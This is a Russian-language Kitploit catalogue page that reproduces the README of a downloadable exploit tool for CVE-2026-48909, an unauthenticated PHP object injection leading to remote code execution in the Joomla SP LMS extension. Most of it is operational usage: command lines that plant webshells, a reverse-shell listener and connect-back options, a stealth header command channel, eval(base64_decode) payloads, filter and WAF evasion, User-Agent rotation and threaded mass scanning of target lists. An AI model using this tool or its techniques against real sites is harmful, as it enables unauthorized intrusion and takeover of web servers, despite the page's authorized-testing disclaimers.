Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 — Эксплойт неаутентифицированной инъекции PHP-объектов до RCE для расширения Joomla SP LMS версий <= 4.1.3. Использует десериализацию cookie lmsOrders для записи веб-шелла через цепочку гаджетов Joomla FormattedtextLogger. Включает интерактивную оболочку, обнаружение путей и очистку. Только для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
Анализ уязвимостейАнализ КодаЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed Teaming
Разработка Полезной Нагрузки
Лаборатории и Практика
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

Репозиторий
221 месяц назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2026-48909 — Эксплойт неаутентифицированной инъекции PHP-объектов до RCE для расширения Joomla SP LMS версий <= 4.1.3. Использует десериализацию cookie lmsOrders для записи веб-шелла через цепочку гаджетов Joomla FormattedtextLogger. Включает интерактивную оболочку, обнаружение путей и очистку. Только для авторизованного тестирования безопасности.

Поделиться

CVE-2026-48909

Joomla SP LMS — Неаутентифицированная PHP-инъекция объектов → Удаленное выполнение кода

Python Version CVSS License Platform

Инструмент для доказательства концепции уязвимости CVE-2026-48909
Автор: Sudeepa Wanigarathna

joomla1

[!IMPORTANT] Только для авторизованного использования. Этот инструмент предназначен для исследований в области безопасности, обучения и тестирования систем, которые принадлежат вам или на которые у вас есть явное письменное разрешение. Несанкционированный доступ к компьютерным системам незаконен. Автор не несет ответственности за неправомерное использование.


Содержание

  • Обзор
  • Детали уязвимости
  • Возможности
  • Установка
  • Быстрый старт
  • Руководство по использованию
  • Справочник по аргументам
  • Типы нагрузок
  • Цепочка атаки
  • Примеры вывода
  • Устранение неполадок
  • Структура репозитория
  • История версий
  • Отказ от ответственности
  • Автор

Обзор

CVE-2026-48909 — критическая неаутентифицированная PHP-инъекция объектов в расширении Joomla SP LMS. Данный инструмент реализует полную цепочку атаки, позволяя специалистам по безопасности проверить воздействие в лабораторных или авторизованных средах.

Он охватывает обнаружение, поиск путей, доставку нагрузки, интерактивную постэксплуатацию (если разрешено), массовую оценку и необязательную очистку.


Детали уязвимости

АтрибутЗначение
CVE IDCVE-2026-48909
CVSS9.5 (Критическая)
Вектор атакиСеть — без аутентификации
ВоздействиеУдаленное выполнение кода
Затронутый продуктJoomla SP LMS
Затронутые версии1.0.0 – 4.1.3
Исправленная версияSP LMS 4.1.4+
Цепочка гаджетовТребуется Joomla < 5.2.2

Матрица совместимости

КомпонентВерсияRCE
SP LMS< 4.1.4Уязвим
SP LMS≥ 4.1.4Исправлен
Joomla< 5.2.2Цепочка гаджетов работоспособна
Joomla≥ 5.2.2Цепочка гаджетов исправлена

Возможности

Основные

ВозможностьОписание
Неаутентифицированная эксплуатацияУчетные данные не требуются
Множество нагрузок7 вариантов веб-шеллов / исполнения
Интерактивная оболочкаСессия с историей команд после развертывания
Поиск путиАвтоматический поиск путей для записи
ОчисткаУдаление развернутого веб-шелла после тестов

Оценка и эксплуатация

ВозможностьОписание
Массовое сканированиеМногопоточный список целей (1000+)
Поддержка проксиHTTP/SOCKS (Burp, ZAP и др.)
Реверс-шеллНагрузки с прослушивателем
Скрытый режимКаналы команд через заголовки / POST
РандомизацияUUID-имена шеллов, ротация User-Agent
ОтчетностьЭкспорт в JSON, HTML или CSV
Помощь в обнаруженииПроверка версий Joomla, --check-only, --safe-mode

Примечания по обходу защиты

  • По возможности избегает символов, блокируемых фильтром cmd в Joomla
  • Шестнадцатеричное кодирование пути записи PHP для уменьшения проблем с base64-заполнением / слешами
  • Настраиваемые задержки и ротация User-Agent
  • Логика повторных попыток для нескольких кандидатов на инъекцию / путь

Установка

Предварительные требования

  • Python 3.6+
  • pip
  • Сетевая доступность до целевой(ых) системы(м) в рамках тестирования

Настройка

root@kitploit:~
cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

Зависимости

root@kitploit:~
requests>=2.31.0
urllib3>=2.0.0

argparse поставляется со стандартной библиотекой Python; устанавливать его через pip не требуется.


Быстрый старт

Замените https://target.example на лабораторную или авторизованную цель.

Одна цель — поиск пути + интерактивная оболочка

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Безопасные проверки (без эксплуатации)

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

Массовое сканирование

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

Реверс-шелл (авторизованная лаборатория)

root@kitploit:~
# Прослушиватель
nc -lvnp 4444

# Цель эксплуатации
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

Руководство по использованию

Поиск пути

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

Известный путь для записи

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

Интерактивная сессия

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

Однократная команда

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

Скрытая нагрузка + интерактив

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

Прокси (Burp / ZAP)

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

Очистка

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

Формат списка целей

root@kitploit:~
https://lab-a.example
https://lab-b.example
https://lab-c.example
root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

Справочник по аргументам

Цель

АргументОписание
targetURL одной цели
--targets, -T FILEФайл со списком целей (по одному URL на строку)
--path PATHАбсолютный серверный путь для веб-шелла
--shell-type TYPEminimal, standard, stealth, base64, full, reverse, blindshell
--shell-name NAMEИмя файла веб-шелла (по умолчанию: x.php)

Сеть

АргументОписание
--timeout SECONDSТайм-аут запроса (по умолчанию: 15)
--insecureПропустить проверку TLS-сертификата
--proxy URLНапример, http://127.0.0.1:8080
--random-uaРотация User-Agent (включено по умолчанию)
--delay SECONDSЗадержка между запросами

Реверс-шелл

АргументОписание
--reverse-host HOSTХост прослушивателя
--reverse-port PORTПорт прослушивателя

Режимы

АргументОписание
--interactive, -iИнтерактивная оболочка после развертывания
--check-onlyТолько проверка уязвимости
--safe-modeНеразрушающее тестирование
--find-pathАвтоматическое обнаружение пути для записи
--cmd COMMANDВыполнить одну команду и завершить работу
--cleanup PATHУдалить веб-шелл по указанному пути
--cleanup-afterОчистка после эксплуатации

Массовое сканирование / отчет

АргументОписание
--threads NUMПотоки-обработчики (по умолчанию: 10)
--export FILEПуть для сохранения результатов
--export-format FORMATjson, html, csv (по умолчанию: json)

Логирование

АргументОписание
--log-file FILEЗапись логов в файл
--quiet, -qТихий режим
--verbose, -vПодробный вывод
--no-bannerСкрыть баннер

Типы нагрузок

ТипПоведениеОбычное применение
minimalКомпактное исполнение через GETОграниченное пространство / быстрая проверка
standardGET + POST cmd (по умолчанию)Общие оценки
stealthКоманда через заголовок X-CmdУменьшение логирования URL
base64eval(base64_decode(...)) через POSTЛаборатории по обходу фильтров
fullGET/POST + канал base64Более широкий контроль
reverseПодключаемая обратно оболочкаПостоянный доступ в лаборатории
blindshellАльтернативный шаблон включения / выполненияОграниченные среды
root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type minimal --find-path
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path -i
python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type reverse \
  --reverse-host 10.0.0.1 --reverse-port 4444 --find-path

Цепочка атаки

root@kitploit:~
flowchart TD
    A["Управляемая атакующим cookie lmsOrders"] --> B["unserialize() в cart.php"]
    B --> C["FormattedtextLogger::__destruct()"]
    C --> D["File::write() — сброс PHP"]
    D --> E["Веб-шелл на диске"]
    E --> F["Удаленное выполнение команд"]

Техническое резюме

  1. Сток — components/com_splms/models/cart.php десериализует cookie lmsOrders, декодированную из base64.
  2. Гаджет — Joomla\CMS\Log\Logger\FormattedtextLogger::__destruct() запускает запись в файловую систему.
  3. Нагрузка — PHP-тело закодировано в hex, дополнено по длине, чтобы избежать отфильтрованных символов base64 (/, =, +).
  4. Выполнение — Записанный скрипт запрашивается для выполнения команд ОС.

Обход фильтра ввода (высокоуровнево)

Фильтр cmd в Joomla может отбрасывать /, = и +. Этот инструмент компенсирует это путем:

  • Кодирования содержимого записи в hex
  • Дополнения сериализованных / base64-форм для избегания недопустимых символов
  • Перебора кандидатов до получения безопасной для фильтра нагрузки

Примеры вывода

Интерактивная сессия

root@kitploit:~
shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

shell> whoami
www-data

shell> pwd
/var/www/html

shell> exit

Экспорт JSON (формат)

root@kitploit:~
{
  "timestamp": "2026-07-16T10:30:00.123456",
  "target": "https://lab.example",
  "shell_path": "/tmp/x_abc123def.php",
  "shell_url": "https://lab.example/tmp/x_abc123def.php",
  "shell_type": "standard",
  "vulnerable": true,
  "exploited": true,
  "joomla_version": "4.3.2",
  "detected_paths": [
    "/tmp/x_abc123def.php",
    "/images/x_abc123def.php",
    "/cache/x_abc123def.php"
  ],
  "author": "Sudeepa Wanigarathna",
  "tool_version": "3.0"
}

Однократная команда

root@kitploit:~
python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

Устранение неполадок

СимптомЧто попробовать
Не удалось сгенерировать безопасную для фильтра нагрузкуИспользуйте другой --path или --find-path; избегайте необычных символов в пути
Проверка шелла не удаласьУвеличьте --timeout; попробуйте --shell-type standard; убедитесь, что system() и подобные не отключены; проверьте возможность записи
Цель не выглядит уязвимойSP LMS ≤ 4.1.3, Joomla < 5.2.2, com_splms присутствует; проверьте блокировки WAF
HTTP 500--insecure, --timeout 30, просмотрите логи приложения / сервера
Отказ в подключении к проксиУбедитесь, что прокси слушает; проверьте схему URL, хост и порт
Ошибка проверки TLSДобавьте --insecure для лабораторных конечных точек с некорректными сертификатами

Процесс отладки

root@kitploit:~
# Подробный вывод + файл лога
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path -v --log-file debug.log

# Через Burp
python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path \
  --proxy http://127.0.0.1:8080 --insecure -v

# Сначала неразрушающий тест
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

Структура репозитория

root@kitploit:~
exploit/
├── CVE-2026-48909 v3.0.py   # Основной инструмент (v3.0)
├── requirements.txt         # Python-зависимости
├── README.md                # Этот файл
└── venv/                    # Локальная виртуальная среда (опционально, не в репозитории)

Дополнительные файлы для публичного релиза:

root@kitploit:~
targets.txt.example
docs/technical-details.md
examples/basic-exploit.sh
examples/mass-scan.sh

История версий

v3.0.0 — Ultimate Edition (июль 2026)

  • Массовое сканирование с многопоточностью
  • Поддержка прокси HTTP/SOCKS
  • Нагрузки реверс-шелла
  • Помощь в обходе WAF
  • Интерактивная скрытая оболочка
  • Опции автоматической очистки
  • Отчетность в JSON / HTML / CSV
  • Расширенный список путей для записи
  • Помощь в определении версии Joomla
  • Безопасный режим и ротация User-Agent
  • Настраиваемые задержки запросов

v2.1 — Professional Edition (июль 2026)

  • Исправления генерации нагрузки
  • Улучшенная обработка ошибок и логирование

Отказ от ответственности

Этот проект предоставляется как есть для оборонительных исследований безопасности и авторизованного тестирования на проникновение.

Используя данное программное обеспечение, вы соглашаетесь с тем, что:

  1. Вы будете атаковать только системы, которые вам принадлежат или на тестирование которых у вас есть явное разрешение.
  2. Вы понимаете применимые законы о компьютерных злоупотреблениях и защите данных.
  3. Автор и соавторы не несут ответственности за повреждения, потерю данных или юридические последствия, возникшие в результате неправомерного использования.

Если вы обнаружили эту уязвимость в реальных условиях, следуйте практике ответственного раскрытия и координируйте действия с вендором / CERT, где это уместно.


Автор

Sudeepa Wanigarathna
Исследователь безопасности · Этичный хакинг · Исследование уязвимостей · Инструментарий на Python


Поддержка

  • Поставьте звезду репозиторию, если он помог вашим исследованиям
  • Открывайте Issues для багов или ложных срабатываний
  • Приветствуются Pull Request'ы для документации, точности обнаружения и UX в авторизованных лабораториях

Только для авторизованного тестирования безопасности.

Скачать инструмент